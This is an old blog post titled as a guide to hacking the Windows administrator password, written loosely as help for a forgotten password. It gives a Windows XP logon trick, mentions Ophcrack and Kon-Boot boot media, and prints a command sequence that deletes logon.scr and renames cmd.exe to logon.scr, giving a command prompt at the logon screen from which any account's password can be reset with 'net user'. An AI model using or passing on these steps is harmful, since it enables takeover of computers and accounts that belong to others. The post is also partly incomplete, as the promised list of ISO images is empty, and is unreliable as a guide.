Saturday 26 January 2013

Windows Administrator Password Hacking

There are different ways to hack the windows administrator password and gain acces to it.

If you forget password of your windows thn use this ways to bypass your account.

In Windows Xp.

When you power on the PC then you will get a log on screen.

then you press ctrl + alt + del  then you will get the another log on screen 

In another logon screen, remove the name of user and type "administrator" in the user name then you will get acces to the system.


You can bypass windows xp,7 and vista by an ophtcrack,konboot.
Its very easy you can easily bypass the password by downloading the
 free ISO image, burn it to a CD and boot to the CD. 

The list of iso which is used for by passing the windows password is



Another way to hack windows password is 

cd \windows\system32
mkdir temphack                                          /* This command is used for making directory*/
copy logon.scr temphack\logon.scrn            /* This command is used for copying logon.scr to temphack directory*/
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr

When you switch on your pc then logon screen shows an unsecure command prompt then you can reset your password by net user command.

In command prompt 
net user "name of user" "password"

net user sriram 1234

here sriram is the username and 1234 is the newly assigned password

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